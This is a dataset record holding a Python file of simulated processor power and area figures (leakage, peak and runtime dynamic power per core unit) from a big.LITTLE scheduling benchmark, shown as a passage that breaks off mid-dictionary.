| 31.4 | 45 | 0.872611 | 16 | 157 | 8.5625 | 0.5625 | 0.248175 | 0.335766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014184 | 0.101911 | 157 | 4 | 46 | 39.25 | 0.957447 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a439618ed529308e0ed43b6a0258a9455cf6be7d | 68,607 | py | Python | benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_ml/SystemIPC/EightThreads_cactusADM/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_ml/SystemIPC/EightThreads_cactusADM/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_ml/SystemIPC/EightThreads_cactusADM/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.186019,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.348796,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.17754,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.417191,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.722423,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.41433,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.55394,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.231841,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 7.33573,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.222463,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0151235,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.171971,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.111847,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.394433,
'Execution Unit/Register Files/Runtime Dynamic': 0.126971,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.466514,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.21449,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.64957,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 4.0638e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 4.0638e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 3.5128e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 1.34522e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0016067,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0017231,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000399199,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.107522,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.264599,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.365193,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 0.739436,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0788638,
'L2/Runtime Dynamic': 0.0225165,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 5.7898,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.2144,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.14729,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.14729,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 6.48817,
'Load Store Unit/Runtime Dynamic': 3.08808,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.363192,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.726385,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.128898,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.130051,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0434713,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.781334,
'Memory Management Unit/Runtime Dynamic': 0.173522,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 28.2145,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.776122,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0306721,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.202831,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.00962,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 8.68275,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0837231,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.268448,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.530377,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.161771,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.260931,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.131709,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.554411,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.103704,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.9154,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.1002,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00678541,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.07723,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0501822,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.17743,
'Execution Unit/Register Files/Runtime Dynamic': 0.0569676,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.183637,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.479928,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.76513,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 2.11377e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 2.11377e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.84999e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 7.21025e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000720872,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000781647,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000199489,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0482415,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.06857,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.118768,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.16385,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.43601,
'Instruction Fetch Unit/Runtime Dynamic': 0.331841,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0344444,
'L2/Runtime Dynamic': 0.00942878,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.27157,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.988552,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0658194,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0658193,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.58238,
'Load Store Unit/Runtime Dynamic': 1.37897,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.162299,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.324598,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0576006,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0581022,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.190793,
